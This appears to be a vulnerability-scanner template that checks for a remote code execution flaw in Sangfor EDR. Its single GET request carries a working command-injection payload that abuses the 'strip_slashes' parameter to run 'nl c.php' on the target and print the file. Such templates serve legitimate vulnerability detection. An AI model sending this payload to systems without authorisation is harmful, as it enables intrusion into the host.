id: CNVD-2020-46552
info:
  name: Sangfor EDR - Remote Code Execution
  author:
  - l0ne1y
  description: |-
    Sangfor Terminal Detection and Response Platform (EDR) RCE Vulnerability
    The Sangfor Terminal Detection and Response Platform (EDR) has an RCE vulnerability. Attackers can exploit it by crafting HTTP requests; an attacker who successfully exploits it can execute arbitrary commands on the target host.
  severity: critical
  remediation: |-
    Official remediation:
    1. It is recommended that users obtain the latest patch or the latest version of the program from the vendor:
    https://www.sangfor.com.cn/product/net-safe-mobile-security-edr.html
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - contains(body, "$show_input = function($info)")
    - contains(body, "$strip_slashes($host)")
    - contains(body, "Log Helper")
    - status_code == 200
  path:
  - '{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php'
  method: GET
